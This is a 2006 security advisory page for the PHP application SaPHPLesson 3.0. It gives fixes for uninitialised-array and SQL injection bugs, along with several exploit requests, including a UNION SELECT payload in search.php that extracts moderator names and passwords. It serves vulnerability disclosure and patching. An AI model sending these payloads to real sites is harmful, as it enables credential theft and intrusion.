|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 862 CVE : CVE-2006-2279 CVE : CVE-2006-2278 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : o y 6 hotmail com Published : 10.05.2006
Advisory Content : SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --: 1- Unfilter array Filename :- show.php Line :- 102 [code] $hrow[] = $Row2;[/code] Fix :- Add To Line [ 11 ] /show.php This Code :- we add the code to global to fix all unfilter ver. at the code :) [code] $hrow = array();[/code] Exploit :- GET ^ /lessons/show.php?lessid=1&hrow=D3vil-0x1 /---------------------------------------------------------/ 2- Unfilter array Filename :- showcat.php Line :- 80 [code] $Lsnrow[] = $Row;[/code] Fix :- Add To Line [ 11 ] /showcat.php This Code :- we add the code to global to fix all unfilter ver. at the code :) [code] $Lsnrow = array();[/code] Exploit :- GET ^ /lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1 /---------------------------------------------------------/ 3- SQL Injection Filename :- search.php Line :- MultLines Fix :- Line 28 Replace It With [code] $Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code] Line 32 Replace It With [code] $Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code] Exploit :- POST ^ Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,nu ll,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC /---------------------------------------------------------/ 4- SQL Injection Filename :- misc.php Line :- 64 Fix :- Replace Line 62 & 63 With This Code [code] $LID = intval($_GET["LID"]); $Rate = intval($_POST["Rate"]);[/code] /---------------------------------------------------------/ 5- Unfilter array Filename :- index.php Line :- 24 [code] $rows[] = $Row;[/code] Fix :- Add To Line [ 11 ] /index.php This Code :- we add the code to global to fix all unfilter ver. at the code :) [code] $rows = array(); $hrow = array();[/code] Exploit :- GET ^ /saphplesson/index.php?rows=D3vil-x01  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |